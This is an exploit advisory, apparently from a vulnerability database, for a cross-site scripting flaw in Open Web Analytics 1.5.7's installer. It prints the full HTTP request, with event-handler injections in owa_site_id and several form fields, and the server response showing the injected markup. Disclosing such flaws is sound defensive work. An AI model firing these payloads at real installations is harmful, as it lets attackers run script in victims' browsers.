Open Web Analytics 1.5.7 Cross Site Scripting

2016-02-25 / 2016-02-26
Credit: 1N
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Exploit Title: Open Web Analytics v1.5.7 Cross-Site Scripting Author: 1N3 @CrowdShield https://crowdshield.com Vendor: http://www.openwebanalytics.com/ Date: 02/24/2016 Description: Open Web Analytics suffers from a Cross-Site Scripting vulnerability in the owa_site_id parameter because it fails to sanitize input before rendering the content to the user. The vulnerability can be triggered by hitting the ALT+SHIFT+X key after the payload is injected. Request: POST /install.php?owa_site_id=1"/accesskey="X"/onclick="alert(1)"><!--%20&owa_do=base.installDefaultsEntry& HTTP/1.1 Host: web.kiwi.ki User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://web.kiwi.ki/install.php?owa_site_id=&owa_do=base.installDefaultsEntry& Cookie: owa_v=cdh%3D%3Ea2fc6dac%7C%7C%7Cvid%3D%3E1456351264222521405%7C%7C%7Cfsts%3D%3E1456351264%7C%7C%7Cdsfs%3D%3E0%7C%7C%7Cnps%3D%3E1; owa_s=cdh%3D%3Ea2fc6dac%7C%7C%7Clast_req%3D%3E1456351264%7C%7C%7Csid%3D%3E1456351264683274933%7C%7C%7Cdsps%3D%3E0%7C%7C%7Creferer%3D%3E%28none%29%7C%7C%7Cmedium%3D%3Edirect%7C%7C%7Csource%3D%3E%28none%29%7C%7C%7Csearch_terms%3D%3E%28none%29 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 295 owa_protocol=http%3A%2F%2F&owa_domain=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_email_address=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_password=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_nonce=4076e70a50&owa_action=base.installBase&owa_save_button=Continue... Response: <input size="70" name="owa_go" value="https://web.kiwi.ki/install.php?owa_site_id=1" accesskey="X" onclick="alert(1)" type="hidden"><!--%20&owa_do=base.installDefaultsEntry&">


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top